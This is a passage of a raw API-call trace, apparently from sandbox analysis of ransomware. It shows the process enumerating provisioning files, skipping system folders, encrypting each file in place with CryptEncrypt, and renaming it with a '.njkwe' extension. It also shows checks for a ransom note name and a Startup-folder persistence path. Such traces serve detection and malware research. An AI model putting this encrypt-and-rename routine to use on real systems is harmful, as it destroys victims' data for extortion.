"c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\302__connections_cellular_telecom new zealand (new zealand)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.135] GetProcessHeap () returned 0xbe0000 [0078.135] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.135] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b39042, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b39042, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b39042, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x30b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", cAlternateFileName="303__C~1.PRO")) returned 1 [0078.135] lstrcmpiW (lpString1="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.135] lstrcmpiW (lpString1="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.135] lstrcmpiW (lpString1="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.135] lstrcmpiW (lpString1="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.135] lstrcmpiW (lpString1="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.135] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml") returned 169 [0078.135] StrStrIW (lpFirst="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.135] lstrcmpW (lpString1="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.135] lstrcmpW (lpString1="303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.135] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\303__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.135] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\303__connections_cellular_vodafone nz (new zealand)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.135] GetTickCount () returned 0x1153dd0 [0078.135] GetTickCount () returned 0x1153dd0 [0078.135] GetTickCount () returned 0x1153dd0 [0078.135] GetTickCount () returned 0x1153dd0 [0078.135] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.136] GetProcessHeap () returned 0xbe0000 [0078.136] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.136] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x30b, lpOverlapped=0x0) returned 1 [0078.143] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.143] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x30b, lpOverlapped=0x0) returned 1 [0078.143] GetProcessHeap () returned 0xbe0000 [0078.143] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.143] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.143] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.143] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.143] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.143] CloseHandle (hObject=0x43c) returned 1 [0078.144] GetProcessHeap () returned 0xbe0000 [0078.144] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.144] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0078.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\303__connections_cellular_vodafone nz (new zealand)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\303__Connections_Cellular_Vodafone NZ (New Zealand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\303__connections_cellular_vodafone nz (new zealand)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.144] GetProcessHeap () returned 0xbe0000 [0078.144] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.144] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b39042, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b39042, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b39042, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="304__C~1.PRO")) returned 1 [0078.144] lstrcmpiW (lpString1="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.144] lstrcmpiW (lpString1="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.144] lstrcmpiW (lpString1="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.144] lstrcmpiW (lpString1="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.144] lstrcmpiW (lpString1="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.144] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.145] StrStrIW (lpFirst="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.145] lstrcmpW (lpString1="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.145] lstrcmpW (lpString1="304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.145] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\304__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.145] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\304__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.145] GetTickCount () returned 0x1153de0 [0078.145] GetTickCount () returned 0x1153de0 [0078.145] GetTickCount () returned 0x1153de0 [0078.145] GetTickCount () returned 0x1153de0 [0078.145] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.145] GetProcessHeap () returned 0xbe0000 [0078.145] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.145] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.146] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.146] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.146] GetProcessHeap () returned 0xbe0000 [0078.146] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.146] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.146] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.148] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.148] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.148] CloseHandle (hObject=0x43c) returned 1 [0078.148] GetProcessHeap () returned 0xbe0000 [0078.148] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.148] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\304__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\304__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.149] GetProcessHeap () returned 0xbe0000 [0078.149] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.149] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b5f2b1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b5f2b1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b5f2b1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2fd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", cAlternateFileName="305__C~1.PRO")) returned 1 [0078.149] lstrcmpiW (lpString1="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.149] lstrcmpiW (lpString1="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.149] lstrcmpiW (lpString1="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.149] lstrcmpiW (lpString1="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.149] lstrcmpiW (lpString1="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.149] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml") returned 161 [0078.149] StrStrIW (lpFirst="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.149] lstrcmpW (lpString1="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.149] lstrcmpW (lpString1="305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.149] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\305__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.149] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\305__connections_cellular_claro (nicaragua)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.149] GetTickCount () returned 0x1153de0 [0078.149] GetTickCount () returned 0x1153de0 [0078.149] GetTickCount () returned 0x1153de0 [0078.149] GetTickCount () returned 0x1153de0 [0078.150] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.150] GetProcessHeap () returned 0xbe0000 [0078.150] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.150] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2fd, lpOverlapped=0x0) returned 1 [0078.151] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.151] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2fd, lpOverlapped=0x0) returned 1 [0078.151] GetProcessHeap () returned 0xbe0000 [0078.151] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.151] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.151] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.151] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.152] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.152] CloseHandle (hObject=0x43c) returned 1 [0078.152] GetProcessHeap () returned 0xbe0000 [0078.152] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.152] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0078.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\305__connections_cellular_claro (nicaragua)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\305__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\305__connections_cellular_claro (nicaragua)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.152] GetProcessHeap () returned 0xbe0000 [0078.152] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.152] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b5f2b1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b5f2b1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b5f2b1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", cAlternateFileName="306__C~1.PRO")) returned 1 [0078.152] lstrcmpiW (lpString1="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.152] lstrcmpiW (lpString1="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.153] lstrcmpiW (lpString1="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.153] lstrcmpiW (lpString1="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.153] lstrcmpiW (lpString1="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.153] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml") returned 161 [0078.153] StrStrIW (lpFirst="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.153] lstrcmpW (lpString1="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.153] lstrcmpW (lpString1="306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.153] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\306__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.153] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\306__connections_cellular_claro (nicaragua)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.153] GetTickCount () returned 0x1153df0 [0078.153] GetTickCount () returned 0x1153df0 [0078.153] GetTickCount () returned 0x1153df0 [0078.154] GetTickCount () returned 0x1153df0 [0078.154] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.154] GetProcessHeap () returned 0xbe0000 [0078.154] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.154] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x311, lpOverlapped=0x0) returned 1 [0078.155] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.155] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x311, lpOverlapped=0x0) returned 1 [0078.155] GetProcessHeap () returned 0xbe0000 [0078.155] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.155] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.155] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.155] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.156] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.156] CloseHandle (hObject=0x43c) returned 1 [0078.156] 